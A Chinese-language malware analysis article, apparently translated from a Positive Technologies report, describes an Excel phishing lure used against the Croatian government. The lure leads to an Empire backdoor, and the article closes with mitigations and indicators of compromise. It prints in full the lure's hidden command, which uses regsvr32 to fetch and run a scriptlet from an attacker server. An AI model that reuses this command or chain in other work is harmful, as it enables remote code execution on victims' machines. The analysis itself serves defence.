我們是如何發現針對歐洲政府的攻擊

  • 2019 年 10 月 4 日
  • 筆記

尋找新型以及危險的網路威脅是PT ESC安全中心的主要工作之一,2019年中旬,PT ESC的分析人員發現了一起針對克羅埃西亞政府的網路攻擊。在這篇文章中,我們將針對這一攻擊活動進行分析,而且據我們所知,這種新型的攻擊框架在此之前從未有人使用過。

感染鏈

2019年4月2日,在常規的惡意軟體監控活動中,PT ESC的研究人員發現了一份可疑的Office文檔:

這是一份excel文件,它偽裝成了包裹通知,並存儲為了舊版本的.xls格式(時間戳:2019-04-01 16:28:07 (UTC))。然而,該文件的「上次列印」時間戳(2018-07-2500:12:30 (UTC))表明該文檔曾在2018年被使用過。

需要注意的是,文件的注釋資訊包含了Windows控制台命令:



cmd.exe/c echo Set objShell = CreateObject("Wscript.Shell"): objShell.Run"net use https://postahr.vip", 0, False: Wscript.Sleep 10000:objShell.Run "regsvr32 /u /n /s /i:https://postahr.vip/page/1/update.sctscrobj.dll", 0, False: Set objShell = Nothing  >C:users%username%appdatalocalmicrosoftsilent.vbs














這條命令會創建一個VB腳本,運行之後會執行下列任務:




1、建立一條WebDAV網路連接;  2、下載並運行文件以備下一階段的感染,需要藉助合法的系統實用工具regsvr32。




在與攻擊者的伺服器建立了HTTP(S)連接之後,腳本會發送一個NTLM請求。這個請求可以用來恢復NTLM哈希來進行pass-the-hash攻擊。


這種利用regsvr32來進行惡意攻擊的技術被稱為Squiblydoo,之前也有過相關介紹。攻擊者可以使用它來繞過應用程式白名單,並躲避反病毒產品的檢測。


注釋參數的內容本身並不會進行什麼操作,而是會觸發其他操作。當目標用戶打開Excel文檔之後,會彈出一條資訊來要求用戶啟用宏功能:








如果用戶點擊了「啟用內容」按鈕,則會彈出一條偽造的消息,其中包含Croatian Post的logo和包裹通知:








與此同時,惡意宏將運行文件注釋中的命令,新的腳本將會添加到系統的啟動項中:








有趣的是,這個新腳本並不是由惡意宏運行的,這很有可能是攻擊者專門設計的,因為攻擊者需要在重啟並用戶登錄之後進行下一階段的感染。需要注意的是,其中的程式碼結構非常好,縮進和格式都很整潔,並且從第三方源「借用」了一些程式碼。








而且攻擊者還從網上「抄襲」了一些程式碼,並進行了修改:




















接下來,我們看看下一階段攻擊者如何使用regsvr32來實現感染。命令運行之後,會從攻擊者的伺服器下載一個JavaScriptscriptlet,Body中包含有Base64編碼的數據。解碼之後,數據會被反序列化,並由.NET框架運行。








這裡的部分程式碼也是攻擊者從網上「借鑒」過來的:














從表面上看,攻擊者對所使用的工具並沒有非常深刻的了解。比如說,scriptlet調用了setversion函數,但並沒做任何其他的事情,在線提供的一個示例scriptlet也是如此。


解包並運行之後,程式碼會下載一個.NET可執行文件(PE文件)。














編譯後,源程式碼文件夾的路徑仍然存在。這裡的-master後綴表明,這些程式碼是直接從程式碼庫中克隆過來的。其中一個目錄路徑為SharpPick的組件,它可以用來下載並運行跟.NET有依賴關係的PowerShell程式碼,而不需要額外的程式碼解釋器。








反編譯之後,我們得到了PowerShell腳本程式碼:








這段程式碼會進行下列操作:




1、創建一個對象來與Web伺服器交互,包含User-Agent、Cookie和代理設置。  2、Payload會從上述地址中下載。  3、使用RC4密鑰解碼並運行下載下來的數據。




不幸的是,C2伺服器在此時已經無法訪問了,所以我們無法獲取到之前的數據了。但是,調查結果顯示這個感染鏈為Empire Backdoor(輸入Empire後滲透利用框架),它可以幫助攻擊者遠程控制目標用戶的電腦。








緩解方案




1、監控特定白名單應用程式的使用:certutil,regsvr32, msbuild, net, wmic。  2、掃描並分析郵件附件以及郵件中的鏈接。  3、定期掃描聯網電腦的RAM。




入侵威脅指標IoC




0adb7204ce6bde667c5abd31e4dea164  13db33c83ee680e0a3b454228462e73f  78184cd55d192cdf6272527c62d2ff89  79e72899af1e50c18189340e4a1e46e0  831b08d0c650c8ae9ab8b4a10a199192  92530d1b546ddf2f0966bbe10771521f  c84b7c871bfcd346b3246364140cd60f  hxxps://postahr.vip/page/1/update.sct  hxxps://posteitaliane.live/owa/mail/archive.srf  hxxps://konzum.win/bat3.txt  hxxp://198.46.182.158/bat3.txt  hxxps://176.105.255.59:8089  []176.105.255.59webdavmsbuild.xml  postahr.online  176.105.254.52  93.170.105.32




* 參考來源:ptsecurity,FB小編Alpha_h4ck編譯,轉載請註明來自FreeBuf.COM







		  				

		  				

													


						
						
						


						 

							
					

					    
									

													

													
											


			


			


	

		
VirMach 便宜 VPS
 


QNews
 
QNews